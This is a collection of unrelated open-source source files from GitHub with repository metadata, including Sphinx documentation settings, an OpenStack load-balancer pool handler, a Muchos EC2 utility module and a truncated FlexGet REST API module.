#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'canonical_url': 'https://www.geomesa.org/documentation/',
'analytics_id': 'UA-53087457-1',
'collapse_navigation': True,
'navigation_depth': 4
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Customized CSS file
html_style = 'css/theme_custom.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'GeoMesa'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
# note: shown in our custom footer
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# note: shown in our custom footer
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# note: shown in our custom footer
html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'GeoMesadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GeoMesa.tex', u'GeoMesa Documentation',
u'GeoMesa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'geomesa', u'GeoMesa Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GeoMesa', u'GeoMesa Documentation',
author, 'GeoMesa', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# strip out the leading `$` in bash examples and `>` in accumulo examples
copybutton_prompt_text = "[$>] "
copybutton_prompt_is_regexp = True
# but keep all lines, as we also have a lot of scala/java examples that don't have prompts
copybutton_only_copy_prompt_lines = False
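# With the settings above, a copied snippet such as
#     $ tar xzf geomesa-accumulo-dist.tar.gz
#     > createtable mytable
# loses the leading "$ " / "> " prompts on copy, while Scala/Java examples
# without prompts are copied verbatim (illustrative commands only).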
|
{
"content_hash": "053ada6a05bd4a62a8b8e310ab77a95e",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 211,
"avg_line_length": 34.049180327868854,
"alnum_prop": 0.7115230300112342,
"repo_name": "jrs53/geomesa",
"id": "79ea0f879e13ce6fa7f1c6f84bfb7c0be58cda1b",
"size": "12882",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "docs/common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2900"
},
{
"name": "Java",
"bytes": "264723"
},
{
"name": "JavaScript",
"bytes": "140"
},
{
"name": "Python",
"bytes": "33084"
},
{
"name": "R",
"bytes": "2716"
},
{
"name": "Scala",
"bytes": "8997327"
},
{
"name": "Scheme",
"bytes": "3143"
},
{
"name": "Shell",
"bytes": "114662"
}
],
"symlink_target": ""
}
|
import copy
import logging
from a10_neutron_lbaas.acos import openstack_mappings
from a10_neutron_lbaas.v2 import handler_base_v2
from a10_neutron_lbaas.v2 import handler_persist
from a10_neutron_lbaas.v2 import v2_context as a10
import acos_client.errors as acos_errors
LOG = logging.getLogger(__name__)
class PoolHandler(handler_base_v2.HandlerBaseV2):
def _set(self, set_method, c, context, pool, old_pool=None):
self._update_session_persistence(old_pool, pool, c, context)
args = {'service_group': self.meta(pool, 'service_group', {})}
os_name = pool.name
conf_templates = c.device_cfg.get('templates')
if conf_templates:
service_group_templates = conf_templates.get("service-group", None)
else:
service_group_templates = None
set_method(
self._meta_name(pool),
protocol=openstack_mappings.service_group_protocol(c, pool.protocol),
lb_method=openstack_mappings.service_group_lb_method(c, pool.lb_algorithm),
service_group_templates=service_group_templates,
config_defaults=self._get_config_defaults(c, os_name),
axapi_args=args)
# session persistence might need a vport update
if pool.listener:
# neutron-lbaas object graphs aren't fully populated ...
pool.listener.default_pool_id = pool.listener.default_pool_id or pool.id
# ... and don't update object references from ids
pool.listener.default_pool = pool.listener.default_pool or pool
self.a10_driver.listener._update(c, context, pool.listener)
def _create(self, c, context, pool):
try:
self._set(c.client.slb.service_group.create,
c, context, pool)
except acos_errors.Exists:
pass
def create(self, context, pool):
with a10.A10WriteStatusContext(self, context, pool) as c:
try:
self._set(c.client.slb.service_group.create,
c, context, pool)
except acos_errors.Exists:
pass
def update(self, context, old_pool, pool):
with a10.A10WriteStatusContext(self, context, pool) as c:
self._set(c.client.slb.service_group.update,
c, context, pool, old_pool)
def delete(self, context, pool):
with a10.A10DeleteContext(self, context, pool) as c:
debug_fmt = "handler_pool.delete(): removing member {0} from pool {1}"
for member in pool.members:
LOG.debug(debug_fmt.format(member, member.pool_id))
self.a10_driver.member._delete(c, context, member)
LOG.debug("handler_pool.delete(): Checking pool health monitor...")
if pool.healthmonitor:
# The pool.healthmonitor we get doesn't have a pool
# Make a new one with the hm as the root
hm = copy.copy(pool.healthmonitor)
hm.pool = copy.copy(pool)
hm.pool.healthmonitor = None
LOG.debug("handler_pool.delete(): HM: %s" % hm)
self.a10_driver.hm._delete(c, context, hm)
try:
c.client.slb.service_group.delete(self._meta_name(pool))
except (acos_errors.NotFound, acos_errors.NoSuchServiceGroup):
pass
handler_persist.PersistHandler(
c, context, pool, self._meta_name(pool)).delete()
def _update_session_persistence(self, old_pool, pool, c, context):
# didn't exist, does exist, create
if not old_pool or (not old_pool.session_persistence and pool.session_persistence):
p = handler_persist.PersistHandler(c, context, pool, old_pool)
p.create()
return
# existed, change, delete and recreate
if (old_pool.session_persistence and pool.session_persistence and
old_pool.session_persistence.type != pool.session_persistence.type):
p = handler_persist.PersistHandler(c, context, old_pool)
p.delete()
p = handler_persist.PersistHandler(c, context, pool)
p.create()
return
        # did exist, doesn't exist now, delete
        if old_pool.session_persistence and not pool.session_persistence:
            p = handler_persist.PersistHandler(c, context, pool)
            p.delete()
            return
# didn't exist, doesn't exist
# did exist, does exist, didn't change
return
def stats(self, context, pool):
result = {"stats": {}, "members": {}}
with a10.A10Context(self, context, pool) as c:
name = pool.id
if name is not None:
stats = c.client.slb.service_group.stats(name)
result["stats"] = stats.get("stats", {})
result["members"] = stats.get("members", {})
return result
def _get_expressions(self, c):
        return c.a10_driver.config.get_service_group_expressions()
|
{
"content_hash": "a97b5523ed3bac41e8ba3ce290df9bee",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 91,
"avg_line_length": 39.9140625,
"alnum_prop": 0.5944411822274418,
"repo_name": "hthompson6/a10-neutron-lbaas",
"id": "823a1c0061f074dbdcbb1bfba5455da2c0675f29",
"size": "5744",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10_neutron_lbaas/v2/handler_pool.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1083"
},
{
"name": "Python",
"bytes": "543752"
},
{
"name": "Shell",
"bytes": "6672"
}
],
"symlink_target": ""
}
|
from info import __doc__
from kdtree import *
from ckdtree import *
from qhull import *
__all__ = filter(lambda s: not s.startswith('_'), dir())
__all__ += ['distance']
import distance
from numpy.testing import Tester
test = Tester().test
|
{
"content_hash": "03e14dd26a1da84362b41373df24f624",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 54,
"avg_line_length": 21.727272727272727,
"alnum_prop": 0.6903765690376569,
"repo_name": "scipy/scipy-svn",
"id": "a9b15fa976afde58f9bb7dfcb619aaf86e7eb9c6",
"size": "266",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scipy/spatial/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8532454"
},
{
"name": "C++",
"bytes": "6602032"
},
{
"name": "FORTRAN",
"bytes": "5895476"
},
{
"name": "Objective-C",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "4753723"
},
{
"name": "Shell",
"bytes": "1742"
}
],
"symlink_target": ""
}
|
from rdflib import Literal
from classes import ldp
from namespaces import dcterms, iana, ore, rdf
# alias the RDFlib Namespace
ns = ore
class Proxy(ldp.Resource):
def __init__(self, position, proxy_for, proxy_in):
super(Proxy, self).__init__()
self.title = 'Proxy for {0} in {1}'.format(position, proxy_in.title)
self.prev = None
self.next = None
self.proxy_for = proxy_for
self.proxy_in = proxy_in
def graph(self):
graph = super(Proxy, self).graph()
graph.add((self.uri, rdf.type, ore.Proxy))
graph.add((self.uri, dcterms.title, Literal(self.title)))
graph.add((self.uri, ore.proxyFor, self.proxy_for.uri))
graph.add((self.uri, ore.proxyIn, self.proxy_in.uri))
if self.prev is not None:
graph.add((self.uri, iana.prev, self.prev.uri))
if self.next is not None:
graph.add((self.uri, iana.next, self.next.uri))
return graph
# create proxy object by PUTting object graph
def create_object(self, repository, **kwargs):
        uri = '/'.join([p.strip('/') for p in (self.proxy_for.uri, self.proxy_in.uuid)])
super(Proxy, self).create_object(repository, uri=uri, **kwargs)
|
{
"content_hash": "f7ca362176c074fd1293a2b69f68b574",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 86,
"avg_line_length": 37.333333333333336,
"alnum_prop": 0.6209415584415584,
"repo_name": "peichman-umd/newspaper-batchload",
"id": "2bf671cc606c8791f84e061a47c1f58e903491b1",
"size": "1232",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "classes/ore.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "115680"
},
{
"name": "Shell",
"bytes": "838"
}
],
"symlink_target": ""
}
|
import json
import sys
from setuptools import setup
try:
from jupyterpip import cmdclass
except ImportError:
import pip
import importlib
pip.main(["install", "jupyter-pip"])
cmdclass = importlib.import_module("jupyterpip").cmdclass
with open("setup.json") as f:
setup_data = json.load(f)
if sys.version_info[0] < 3:
# insidious! http://bugs.python.org/issue13943
setup_data["packages"] = [s.encode("utf-8")
for s in setup_data["packages"]]
with open("README.rst") as f:
setup_data.update(
long_description=f.read()
)
setup_data.update(
cmdclass=cmdclass(
path="{}/static/{}".format(
setup_data["packages"][0],
setup_data["name"],
)
)
)
setup(**setup_data)
|
{
"content_hash": "7612d1e4d48832e6a31f6acecfe6e7ac",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 62,
"avg_line_length": 20,
"alnum_prop": 0.5974358974358974,
"repo_name": "bollwyvl/nb-mermaid",
"id": "11cfe1801e65bf82e92d52771a9fdeb59cadd3af",
"size": "826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "50"
},
{
"name": "CoffeeScript",
"bytes": "1378"
},
{
"name": "HTML",
"bytes": "3370"
},
{
"name": "Python",
"bytes": "1143"
},
{
"name": "Shell",
"bytes": "126"
}
],
"symlink_target": ""
}
|
from measurements import webrtc
from telemetry import test
class WebRTC(test.Test):
"""Obtains WebRTC metrics for local video playback."""
test = webrtc.WebRTC
page_set = 'page_sets/webrtc_cases.json'
|
{
"content_hash": "465703b2b6b6230a17350d35ed91925b",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 56,
"avg_line_length": 26.125,
"alnum_prop": 0.7511961722488039,
"repo_name": "anirudhSK/chromium",
"id": "2f1522ea96dadcafe6b877260f8bad51fc510c76",
"size": "371",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tools/perf/benchmarks/webrtc.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ASP",
"bytes": "853"
},
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Arduino",
"bytes": "464"
},
{
"name": "Assembly",
"bytes": "52960"
},
{
"name": "Awk",
"bytes": "8660"
},
{
"name": "C",
"bytes": "42502191"
},
{
"name": "C#",
"bytes": "1132"
},
{
"name": "C++",
"bytes": "201859263"
},
{
"name": "CSS",
"bytes": "946557"
},
{
"name": "DOT",
"bytes": "2984"
},
{
"name": "Java",
"bytes": "5687122"
},
{
"name": "JavaScript",
"bytes": "22163714"
},
{
"name": "M",
"bytes": "2190"
},
{
"name": "Matlab",
"bytes": "2496"
},
{
"name": "Objective-C",
"bytes": "7670589"
},
{
"name": "PHP",
"bytes": "97817"
},
{
"name": "Perl",
"bytes": "672770"
},
{
"name": "Python",
"bytes": "10873885"
},
{
"name": "R",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "1315894"
},
{
"name": "Tcl",
"bytes": "277091"
},
{
"name": "TypeScript",
"bytes": "1560024"
},
{
"name": "XSLT",
"bytes": "13493"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
"""The preprocess mediator."""
from plaso.containers import warnings
class PreprocessMediator(object):
"""Preprocess mediator."""
def __init__(self, storage_writer, knowledge_base):
"""Initializes a preprocess mediator.
Args:
storage_writer (StorageWriter): storage writer, to store preprocessing
information in.
knowledge_base (KnowledgeBase): knowledge base, to fill with
preprocessing information.
"""
super(PreprocessMediator, self).__init__()
self._file_entry = None
self._knowledge_base = knowledge_base
self._storage_writer = storage_writer
@property
def knowledge_base(self):
"""KnowledgeBase: knowledge base."""
return self._knowledge_base
def ProducePreprocessingWarning(self, plugin_name, message):
"""Produces a preprocessing warning.
Args:
plugin_name (str): name of the preprocess plugin.
message (str): message of the warning.
"""
if self._storage_writer:
path_spec = None
if self._file_entry:
path_spec = self._file_entry.path_spec
warning = warnings.PreprocessingWarning(
message=message, path_spec=path_spec, plugin_name=plugin_name)
self._storage_writer.AddPreprocessingWarning(warning)
def SetFileEntry(self, file_entry):
"""Sets the active file entry.
Args:
file_entry (dfvfs.FileEntry): file entry.
"""
self._file_entry = file_entry
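# Illustrative usage sketch (not part of the original module); the plugin name
# and message below are placeholders:
#
#     mediator = PreprocessMediator(storage_writer, knowledge_base)
#     mediator.SetFileEntry(file_entry)
#     mediator.ProducePreprocessingWarning(
#         'windows_registry', 'unable to read Run key')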
|
{
"content_hash": "1f4eb7aaf33fb8fa3782a2b20f7576f3",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 76,
"avg_line_length": 28.76,
"alnum_prop": 0.6731571627260083,
"repo_name": "kiddinn/plaso",
"id": "19c983f050d8dbd875bc9f068e661a62d3ffbe14",
"size": "1462",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaso/preprocessors/mediator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1047"
},
{
"name": "Makefile",
"bytes": "68"
},
{
"name": "PowerShell",
"bytes": "9560"
},
{
"name": "Python",
"bytes": "4878625"
},
{
"name": "Ruby",
"bytes": "926"
},
{
"name": "Shell",
"bytes": "26453"
}
],
"symlink_target": ""
}
|
"""
Utility methods
"""
import os
import sys
from os.path import isfile, join
from optparse import OptionParser
class EC2Type:
def __init__(self, arch, ephemeral=1, has_nvme=False):
self.arch = arch
self.ephemeral = ephemeral
self.has_nvme = has_nvme
AMI_HELP_MSG = """PLEASE NOTE - If you have accepted the software terms for CentOS 7 and still get an error,
this could be due to CentOS releasing new images of CentOS 7. When this occurs, the old images
are no longer available to new users. If you think this is the case, go to the CentOS 7 product
page on AWS Marketplace at the URL below to find the latest AMI:
https://aws.amazon.com/marketplace/pp/B00O7WM7QW
On the product page, find the latest AMI ID for your EC2 region. This should be used to set the 'aws_ami'
property in your muchos.props. After setting the 'aws_ami' property, run the launch command again.
""" # noqa
instance_types = {
"c1.medium": EC2Type("pvm"),
"c1.xlarge": EC2Type("pvm", 4),
"c3.2xlarge": EC2Type("pvm", 2),
"c3.4xlarge": EC2Type("pvm", 2),
"c3.8xlarge": EC2Type("pvm", 2),
"c3.large": EC2Type("pvm", 2),
"c3.xlarge": EC2Type("pvm", 2),
"cc2.8xlarge": EC2Type("hvm", 4),
"cg1.4xlarge": EC2Type("hvm", 2),
"cr1.8xlarge": EC2Type("hvm", 2),
"hi1.4xlarge": EC2Type("pvm", 2),
"hs1.8xlarge": EC2Type("pvm", 24),
"i2.2xlarge": EC2Type("hvm", 2),
"i2.4xlarge": EC2Type("hvm", 4),
"i2.8xlarge": EC2Type("hvm", 8),
"i2.xlarge": EC2Type("hvm"),
"i3.large": EC2Type("hvm", 1, True),
"i3.xlarge": EC2Type("hvm", 1, True),
"i3.2xlarge": EC2Type("hvm", 1, True),
"i3.4xlarge": EC2Type("hvm", 2, True),
"m1.large": EC2Type("pvm", 2),
"m1.medium": EC2Type("pvm"),
"m1.small": EC2Type("pvm"),
"m1.xlarge": EC2Type("pvm", 4),
"m2.2xlarge": EC2Type("pvm", 1),
"m2.4xlarge": EC2Type("pvm", 2),
"m2.xlarge": EC2Type("pvm"),
"m3.2xlarge": EC2Type("hvm", 2),
"m3.large": EC2Type("hvm"),
"m3.medium": EC2Type("hvm"),
"m3.xlarge": EC2Type("hvm", 2),
"m5d.large": EC2Type("hvm", 1, True),
"m5d.xlarge": EC2Type("hvm", 1, True),
"m5d.2xlarge": EC2Type("hvm", 1, True),
"m5d.4xlarge": EC2Type("hvm", 2, True),
"m5d.12xlarge": EC2Type("hvm", 2, True),
"m5d.24xlarge": EC2Type("hvm", 4, True),
"r3.2xlarge": EC2Type("hvm", 1),
"r3.4xlarge": EC2Type("hvm", 1),
"r3.8xlarge": EC2Type("hvm", 2),
"r3.large": EC2Type("hvm", 1),
"r3.xlarge": EC2Type("hvm", 1),
"d2.xlarge": EC2Type("hvm", 3),
"d2.2xlarge": EC2Type("hvm", 6),
"d2.4xlarge": EC2Type("hvm", 12),
"d2.8xlarge": EC2Type("hvm", 24),
}
def verify_type(instance_type):
if instance_type not in instance_types:
print(
"ERROR - EC2 instance type '{}' is currently "
"not supported!".format(instance_type)
)
print("This is probably due to the instance type being EBS-only.")
print("Below is a list of supported instance types:")
for key in instance_types:
print(key)
sys.exit(1)
def get_arch(instance_type):
verify_type(instance_type)
return instance_types.get(instance_type).arch
def get_ephemeral_devices(instance_type):
verify_type(instance_type)
devices = []
ec2_type = instance_types.get(instance_type)
start = 0
if instance_type.startswith("m5d"):
start = 1
for i in range(start, ec2_type.ephemeral + start):
if ec2_type.has_nvme:
devices.append("/dev/nvme" + str(i) + "n1")
else:
devices.append("/dev/xvd" + chr(ord("b") + i))
return devices
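# For example, given the instance_types table above:
#   get_ephemeral_devices("i3.2xlarge")  returns ["/dev/nvme0n1"]
#   get_ephemeral_devices("m5d.4xlarge") returns ["/dev/nvme1n1", "/dev/nvme2n1"]
#   get_ephemeral_devices("d2.2xlarge")  returns ["/dev/xvdb", ..., "/dev/xvdg"]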
def get_block_device_map(instance_type):
verify_type(instance_type)
bdm = [{"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": True}}]
ec2_type = instance_types.get(instance_type)
if not ec2_type.has_nvme:
for i in range(0, ec2_type.ephemeral):
device = {
"DeviceName": "/dev/xvd" + chr(ord("b") + i),
"VirtualName": "ephemeral" + str(i),
}
bdm.append(device)
return bdm
def parse_args(hosts_dir, input_args=None):
parser = OptionParser(
usage="muchos [options] <action>\n\n"
+ "where <action> can be:\n"
+ " launch Launch cluster in Azure or EC2\n"
+ " status Check status of Azure or EC2 cluster\n"
+ " setup Set up cluster\n"
+ " sync Sync ansible directory on cluster proxy node\n"
+ " config Print configuration for that cluster. "
"Requires '-p'. Use '-p all' for all config.\n"
+ " ssh SSH to cluster proxy node\n"
+ " kill Kills processes on cluster started by Muchos\n"
+ " wipe Wipes cluster data and kills processes\n"
+ " terminate Terminate EC2 cluster\n"
+ " cancel_shutdown Cancels automatic shutdown of EC2 cluster",
add_help_option=False,
)
parser.add_option(
"-c", "--cluster", dest="cluster", help="Specifies cluster"
)
parser.add_option(
"-p",
"--property",
dest="property",
help="Specifies property to print (if using 'config' action)"
". Set to 'all' to print every property",
)
parser.add_option(
"-h", "--help", action="help", help="Show this help message and exit"
)
if input_args:
(opts, args) = parser.parse_args(input_args)
else:
(opts, args) = parser.parse_args()
if len(args) == 0:
print("ERROR - You must specify on action")
return
action = args[0]
if action == "launch" and not opts.cluster:
print("ERROR - You must specify a cluster if using launch command")
return
clusters = [f for f in os.listdir(hosts_dir) if isfile(join(hosts_dir, f))]
if not opts.cluster:
if len(clusters) == 0:
print(
"ERROR - No clusters found in conf/hosts "
"or specified by --cluster option"
)
return
elif len(clusters) == 1:
opts.cluster = clusters[0]
else:
print(
"ERROR - Multiple clusters {0} found in conf/hosts/. "
"Please pick one using --cluster option".format(clusters)
)
return
if action == "config" and not opts.property:
print(
"ERROR - For config action, you must set -p to a property or 'all'"
)
return
return opts, action, args[1:]
|
{
"content_hash": "c42af1ddf30624948ebbdd5e9b8584da",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 108,
"avg_line_length": 33.039800995024876,
"alnum_prop": 0.5741605179942779,
"repo_name": "fluo-io/fluo-deploy",
"id": "158ea920892e840c940569ff51820bacd3c4899a",
"size": "7426",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/muchos/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37941"
},
{
"name": "Shell",
"bytes": "7202"
}
],
"symlink_target": ""
}
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HUnitConnectCAE_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HUnitConnectCAE_ConnectedLHS
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HUnitConnectCAE_ConnectedLHS, self).__init__(name='HUnitConnectCAE_ConnectedLHS', num_nodes=0, edges=[])
# Add the edges
self.add_edges([])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """return True"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'HUnitConnectCAE_ConnectedLHS')
self["equations"] = []
# Set the node attributes
# match class Channel(Channel) node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """return True"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["mm__"] = """MT_pre__Channel"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'Channel')
# Add the edges
self.add_edges([
])
# define evaluation methods for each match class.
def eval_attr11(self, attr_value, this):
return True
# define evaluation methods for each match association.
def constraint(self, PreNode, graph):
return True
|
{
"content_hash": "8b7bc97e4358fe711ba6f72c0c57ec64",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 112,
"avg_line_length": 27.104166666666668,
"alnum_prop": 0.6825518831667948,
"repo_name": "levilucio/SyVOLT",
"id": "17c2123dac1c6271a2d0947bc806c9030444d407",
"size": "1301",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "RSS2ATOM/contracts/unit/HUnitConnectCAE_ConnectedLHS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import json
import logging
import os
import re
from collections import deque
from functools import wraps
from flask import Flask, request, jsonify, make_response
from flask_compress import Compress
from flask_cors import CORS
from flask_restplus import Api as RestPlusAPI, Resource
from jsonschema import RefResolutionError
from werkzeug.http import generate_etag
from flexget import manager
from flexget.config_schema import process_config, format_checker
from flexget.utils.database import with_session
from flexget.webserver import User
from . import __path__
__version__ = '1.3.0'
log = logging.getLogger('api')
class APIClient(object):
"""
    This is a client that provides a more Pythonic interface to the REST API.
    It skips HTTP entirely and is only usable from within the running flexget process.
"""
def __init__(self):
self.app = api_app.test_client()
def __getattr__(self, item):
return APIEndpoint('/api/' + item, self.get_endpoint)
def get_endpoint(self, url, data=None, method=None):
if method is None:
method = 'POST' if data is not None else 'GET'
auth_header = dict(Authorization='Token %s' % api_key())
response = self.app.open(url, data=data, follow_redirects=True, method=method, headers=auth_header)
result = json.loads(response.get_data(as_text=True))
# TODO: Proper exceptions
        if not 200 <= response.status_code < 300:
raise Exception(result['error'])
return result
class APIEndpoint(object):
def __init__(self, endpoint, caller):
self.endpoint = endpoint
self.caller = caller
def __getattr__(self, item):
return self.__class__(self.endpoint + '/' + item, self.caller)
__getitem__ = __getattr__
def __call__(self, data=None, method=None):
return self.caller(self.endpoint, data=data, method=method)
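# Illustrative usage sketch (not part of the original module); the endpoint
# names below are placeholders:
#
#     client = APIClient()
#     client.server.version()                  # GET  /api/server/version
#     client.tasks(data=json.dumps(payload))   # POST /api/tasks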
def api_version(f):
""" Add the 'API-Version' header to all responses """
@wraps(f)
def wrapped(*args, **kwargs):
rv = f(*args, **kwargs)
rv.headers['API-Version'] = __version__
return rv
return wrapped
class APIResource(Resource):
"""All api resources should subclass this class."""
method_decorators = [with_session, api_version]
def __init__(self, api, *args, **kwargs):
self.manager = manager.manager
super(APIResource, self).__init__(api, *args, **kwargs)
class API(RestPlusAPI):
"""
Extends a flask restplus :class:`flask_restplus.Api` with:
- methods to make using json schemas easier
- methods to auto document and handle :class:`ApiError` responses
"""
def validate(self, model, schema_override=None, description=None):
"""
When a method is decorated with this, json data submitted to the endpoint will be validated with the given
`model`. This also auto-documents the expected model, as well as the possible :class:`ValidationError` response.
"""
def decorator(func):
@api.expect((model, description))
@api.response(ValidationError)
@wraps(func)
def wrapper(*args, **kwargs):
payload = request.json
try:
schema = schema_override if schema_override else model.__schema__
errors = process_config(config=payload, schema=schema, set_defaults=False)
if errors:
raise ValidationError(errors)
except RefResolutionError as e:
raise APIError(str(e))
return func(*args, **kwargs)
return wrapper
return decorator
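    # Illustrative use of the decorator above (the model and resource method
    # are placeholders, not names defined in this module):
    #
    #     @api.validate(task_model)
    #     def post(self, session=None):
    #         ...  # request.json has already passed schema validation here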
def response(self, code_or_apierror, description='Success', model=None, **kwargs):
"""
Extends :meth:`flask_restplus.Api.response` to allow passing an :class:`ApiError` class instead of
response code. If an `ApiError` is used, the response code, and expected response model, is automatically
documented.
"""
try:
if issubclass(code_or_apierror, APIError):
description = code_or_apierror.description or description
return self.doc(
